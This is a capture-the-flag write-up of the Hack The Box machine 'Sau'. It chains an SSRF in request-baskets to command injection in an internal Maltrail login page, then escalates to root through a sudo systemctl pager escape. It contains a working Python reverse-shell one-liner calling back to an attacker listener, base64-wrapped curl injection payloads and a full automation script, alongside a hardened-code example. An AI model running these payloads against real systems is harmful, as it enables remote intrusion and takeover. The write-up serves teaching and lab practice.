HTB: Sau

Easy HTB machine where an SSRF vulnerability in request-baskets exposes an internal Maltrail instance that is vulnerable to OS command injection; a sudo rule for systemctl then leads to root.

A full TCP port scan shows ports 22 and 55555 open, while ports 80 and 8338 are filtered.

```
DuxSec@hi$ nmap -sV -sS -p- -v -oN nmap_all_ports 10.10.11.224
Nmap scan report for 10.10.11.224
Host is up (0.032s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp    filtered http
8338/tcp  filtered unknown
55555/tcp open     unknown
```

Port 80 is filtered, so it cannot be reached directly from my host.

Port 55555 serves a web application that identifies itself as request-baskets version 1.2.1.


A quick Google search for "request-baskets 1.2.1 exploit" turns up a CVE for SSRF through the basket forward URL: https://gist.github.com/b33t1e/3079c10c88cad379fb166c389ce3b7b3. The details can be read there.


In the top bar I can open the settings.


That brings up the following configuration dialog. The SSRF is abused here by setting the forward URL to localhost on port 80 (http://127.0.0.1:80): the basket server makes that request from inside the box, so the filtering that blocks port 80 from the outside does not apply (remember the nmap scan showed port 80 filtered).

Make sure "Proxy Response" is ticked; without it the request is still forwarded, but the upstream response is not returned to the client, so nothing can be read back.


With that configured, every request sent to http://10.10.11.224:55555/basket123 is forwarded to the internal URL http://127.0.0.1:80 and the response is proxied back to me.

Browsing to http://10.10.11.224:55555/basket123 now shows the internal web application instead of the basket.

At the bottom of the page it states that it is powered by Maltrail v0.53.

Googling "Maltrail v0.53 exploit" leads to the following huntr.dev report, which explains the OS command injection vulnerability in the login handler of Maltrail v0.53:
https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/.

PoC from huntr.dev:

```bash
curl 'http://hostname:8338/login' \
  --data 'username=;`id > /tmp/bbq`'
```

The username parameter ends up inside a shell command string, so anything placed after the `;` (here a backtick command substitution) is executed on the server.
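To make the bug class concrete, here is an added example (my own illustration, not Maltrail's code) of a login handler that builds a log line from the username and shells it out, next to two hardened versions. Maltrail's real sink shells out to `logger`; this example substitutes `echo` so it runs anywhere, and the probe username is constructed to mirror the PoC above.

```python
import shlex
import subprocess

# Constructed attacker-controlled username with the same shape as the PoC:
# a ';' followed by a backtick command substitution.
PROBE = ";`echo INJECTED`"


def log_failed_login_vulnerable(username: str) -> str:
    """Interpolate untrusted input into a command string and run it with
    shell=True. /bin/sh parses the whole string, so backticks, $(...), ';'
    and '|' inside `username` become command syntax, not data.
    (`echo` stands in for Maltrail's `logger` call; assumption for this demo.)"""
    cmd = 'echo "Failed login attempt for user %s"' % username
    return subprocess.check_output(cmd, shell=True, text=True).strip()


def log_failed_login_hardened(username: str) -> str:
    """Fix 1: no shell at all. The message is one argv element handed
    straight to the program, so shell metacharacters are never parsed."""
    return subprocess.check_output(
        ["echo", "Failed login attempt for user %s" % username], text=True
    ).strip()


def log_failed_login_quoted(username: str) -> str:
    """Fix 2: if a shell is unavoidable, quote the untrusted value so the
    shell treats it as a single literal word."""
    msg = shlex.quote("Failed login attempt for user %s" % username)
    return subprocess.check_output("echo %s" % msg, shell=True, text=True).strip()


if __name__ == "__main__":
    print("vulnerable:", log_failed_login_vulnerable(PROBE))
    print("hardened:  ", log_failed_login_hardened(PROBE))
    print("quoted:    ", log_failed_login_quoted(PROBE))
```

Run it and the vulnerable variant prints `INJECTED` in place of the backtick expression, proving the substitution ran; both hardened variants print the probe verbatim.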

First I need to change the forward URL in the basket settings from http://127.0.0.1:80 to http://127.0.0.1:80/login, so that a POST to the basket lands on Maltrail's login endpoint.

Let’s try to get a reverse shell.

Using the Python reverse shell one-liner from PayloadsAllTheThings:

```bash
python3 -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.196",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'
```

I base64-encode this payload so that its quotes, spaces and parentheses do not have to survive the POST body and the target's shell untouched.

```
DuxSec@hi$ cat reverse_shell.py | base64 -w 0
cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjE5NiIsNDI0MikpO3N1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdLHN0ZGluPXMuZmlsZW5vKCksc3Rkb3V0PXMuZmlsZW5vKCksc3RkZXJyPXMuZmlsZW5vKCkpJwo=
```

(-w 0 disables line wrapping, so the output is a single line.)

On the target the base64 has to be decoded back into the command and piped to bash:

```bash
echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjE5NiIsNDI0MikpO3N1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdLHN0ZGluPXMuZmlsZW5vKCksc3Rkb3V0PXMuZmlsZW5vKCksc3RkZXJyPXMuZmlsZW5vKCkpJwo=|base64 -d|bash
```

Now I insert that into the data of the curl command, in place of the `id > /tmp/bbq` from the PoC, and send it through the basket so it reaches the internal login endpoint:

```bash
curl 'http://10.10.11.224:55555/basket123' --data 'username=;`echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjE5NiIsNDI0MikpO3N1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdLHN0ZGluPXMuZmlsZW5vKCksc3Rkb3V0PXMuZmlsZW5vKCksc3RkZXJyPXMuZmlsZW5vKCkpJwo=|base64 -d|bash`'
```
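The two manual steps above (configuring the basket to proxy to 127.0.0.1 and wrapping the reverse shell in base64 for the username field) are scripted end to end in the following added example. It is my own code, not from the original post. Assumptions: the basket is created through request-baskets' REST API (POST /api/baskets/<name> with a JSON config) instead of the settings dialog; the target form-decodes the POST body the way Python's parse_qs does, which is why a `+` in the base64 is percent-encoded (the manual payload above happened to contain none); host, port, basket name and listener address are placeholders.

```python
import base64
import json
import urllib.error
import urllib.parse
import urllib.request

# Placeholders (assumption): target basket server and my listener.
TARGET = "http://10.10.11.224:55555"
BASKET = "basket123"
LHOST, LPORT = "10.10.14.196", 4242


def basket_config(forward_url: str) -> dict:
    """Settings that turn the basket into an open proxy: forward every request
    to forward_url and return the upstream response ('Proxy Response' in the UI).
    Field names follow request-baskets' basket config (assumption: the deployed
    1.2.1 API accepts them as documented)."""
    return {
        "forward_url": forward_url,
        "proxy_response": True,
        "insecure_tls": False,
        "expand_path": True,
        "capacity": 250,
    }


def reverse_shell_cmd(lhost: str, lport: int) -> str:
    """The PayloadsAllTheThings python3 one-liner used above, parameterised."""
    head = ("python3 -c 'import socket,subprocess;"
            "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);")
    connect = 's.connect(("%s",%d));' % (lhost, lport)
    tail = ('subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),'
            "stdout=s.fileno(),stderr=s.fileno())'")
    return head + connect + tail


def injection_body(cmd: str) -> str:
    """Base64-wrap cmd so the POST body carries no quotes, spaces or '&', then
    place it after the ';' in the username field exactly like the PoC.
    '+' is valid base64 but a form parser turns it into a space, so it is
    percent-encoded; '/', '=' and '|' pass through form decoding untouched."""
    b64 = base64.b64encode(cmd.encode()).decode().replace("+", "%2B")
    return "username=;`echo %s|base64 -d|bash`" % b64


def decoded_command(body: str) -> str:
    """Undo injection_body the way the target does (form-decode, then
    base64 -d) to check what /bin/sh will actually run."""
    b64 = body.split("echo ", 1)[1].split("|", 1)[0]
    return base64.b64decode(urllib.parse.unquote(b64)).decode()


def post(url: str, data: bytes, content_type: str) -> int:
    req = urllib.request.Request(url, data=data, method="POST",
                                 headers={"Content-Type": content_type})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


if __name__ == "__main__":
    # 1. SSRF: point the basket at Maltrail's login endpoint on loopback.
    cfg = json.dumps(basket_config("http://127.0.0.1:80/login")).encode()
    print("create basket:", post("%s/api/baskets/%s" % (TARGET, BASKET),
                                 cfg, "application/json"))
    # 2. Command injection through the proxy (start `nc -lnvp 4242` first).
    # The login handler blocks while the reverse shell lives, so this request
    # is expected to time out or error once the shell has connected back.
    body = injection_body(reverse_shell_cmd(LHOST, LPORT)).encode()
    try:
        print("trigger:", post("%s/%s" % (TARGET, BASKET), body,
                               "application/x-www-form-urlencoded"))
    except (urllib.error.URLError, OSError) as exc:
        print("trigger request ended:", exc)
```

The percent-encoding detail matters in practice: a different listener IP or port changes the base64, and as soon as it contains a `+` a form-decoding server would corrupt the payload before `base64 -d` sees it.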

I start my nc listener, run the curl command and receive a shell as puma.

```
DuxSec@hi$ nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.196] from (UNKNOWN) [10.10.11.224] 50712
/bin/sh: 0: can't access tty; job control turned off
$ whoami
puma
$ cd ~
$ ls
linpeas.sh  user.txt
$ cat user.txt
6277461a7719f********
```

Running sudo -l shows that puma may run /usr/bin/systemctl status trail.service as root without a password.

```
$ sudo -l
Matching Defaults entries for puma on sau:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
```

A quick GTFOBins search shows how this can be used to escalate privileges: https://gtfobins.github.io/gtfobins/systemctl/

The privilege escalation needs an interactive TTY, because systemctl only hands its output to a pager when stdout is a terminal. If you don't know how to upgrade a simple shell, read this: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

Running sudo systemctl status trail.service sends the output through the pager (less), and typing !sh at the pager prompt makes less spawn a shell, which inherits root from sudo. The "terminal is not fully functional" warning below is less complaining about the missing TERM variable; it does not stop the trick. One caveat: systemctl runs less with the F flag (quit if the output fits on one screen), so if the status is short the pager exits before you can type anything; shrinking the terminal (for example stty rows 5) forces the prompt to appear.

```
puma@sau:/opt/maltrail$ sudo systemctl status trail.service
WARNING: terminal is not fully functional
-  (press RETURN)!sh
# whoami
root
# cat /root/root.txt
f3f250***********
```